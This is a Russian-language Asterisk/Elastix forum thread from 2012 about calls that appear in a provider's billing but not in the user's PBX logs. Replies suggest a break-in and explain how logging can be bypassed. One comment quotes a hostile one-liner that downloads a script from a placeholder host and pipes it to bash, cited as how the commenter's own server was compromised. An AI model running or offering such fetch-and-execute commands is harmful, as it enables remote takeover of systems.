Пожалуйста, войдите здесь. Часто задаваемые вопросы О нас
Задайте Ваш вопрос

Не отображаются в логах номера вызовов

0

Добрый вечер, коллеги. столкнулся с такой ситуацией, что в статистике провайдера отображаются номера телефонов, которые не отображаются у меня в логах астериска /var/log/asterisk/ или /var/log/elastix/ при этом по логам провайдера вызов идет именно с моего IP шника. в связи с этим вопрос: можно как то увидеть эту ситуацию? кто звонит? и можно ли использовать учетку гостя на астериске для осуществления вызовов? заранее спасибо

удалить закрыть спам изменить тег редактировать

спросил 2012-08-29 16:47:07 +0400

rayden8 Gravatar rayden8
250 38 2 13

Comments

И давно Вас взломали?

zzuz ( 2012-08-29 17:44:25 +0400 )редактировать

А как можно отcследить? если в логах пусто?может есть в самом астере разрешение звонить только с экстеншенов определенных? остальным запрет?

rayden8 ( 2012-08-29 18:05:25 +0400 )редактировать

1 Ответ

Сорт. по » старые новые больше голосов
0

существует простое правило.

чтоб обнаружить взлом, необходимо чтоб уровень занний взломавшего и исследователя был +- на одном уровне.

в вашем случае похоже вам надо обратится к более компетентному специалисту.

астериск не будет писать в лог если стоит verbose 0 и не будет писать в cdr если был выполнен вызов nocdr.

ссылка удалить спам редактировать

ответил 2012-08-29 18:06:49 +0400

meral Gravatar meral flag of Ukraine
23347 24 20 177
http://pro-sip.net/

Comments

А еще он не будет писать если был простой INVITE с наружи на взломанный пир с правильными аутентификационными данными. Нет контекста - нет лога.

zzuz ( 2012-08-29 18:18:41 +0400 )редактировать

так там "с моего ipшника".

meral ( 2012-08-29 18:38:47 +0400 )редактировать

нее ну взлом - это нереально.. у меня за натом и все IP кроме определенного списка запрещено все...

rayden8 ( 2012-08-29 19:35:50 +0400 )редактировать

[так там "с моего ipшника".] вспоминает замечательный 15строчный перловый прокси после взлома recordings . Подменить данные заголовкой труда особо не состовляет , да в этом случае и не нужно , всё происходит на самом сервере. Если фаервол и всё за натом, то обращайтесь за аудитом к специалистам.

zzuz ( 2012-08-29 20:14:36 +0400 )редактировать

возможно такая ситуация, что астериск не все фиксирует. например некоторые разговоры не записываются у меня и в статистике не отображаются хотя мне утверждают люди, что звонили они.

rayden8 ( 2012-08-29 20:38:43 +0400 )редактировать

15-тистрочный? у меня ломали одной строчкой типа /bin/wget http://src_ip/dir/sript -o - |/bin/bash

meral ( 2012-08-29 20:49:48 +0400 )редактировать

Ну , скрипт то тянули , там строк немного)

zzuz ( 2012-08-29 21:43:27 +0400 )редактировать

Ваш ответ

Please start posting your answer anonymously - your answer will be saved within the current session and published after you log in or create a new account. Please try to give a substantial answer, for discussions, please use comments and please do remember to vote (after you log in)!
[скрыть предварительный просмотр]

Закладки и информация

Добавить закладку

подписаться на rss ленту новостей

Статистика

Задан: 2012-08-29 16:47:07 +0400

Просмотрен: 200 раз

Обновлен: Aug 29 '12

Похожие вопросы:

О проекте | Часто задаваемые вопросы | политика конфиденциальности | оставить отзыв

Проект компании "АТС Дизайн"
Asterisk® и Digium® являются зарегистрированными торговыми марками компании Digium, Inc., США.
IP АТС Asterisk распространяется под лицензией GNU GPL.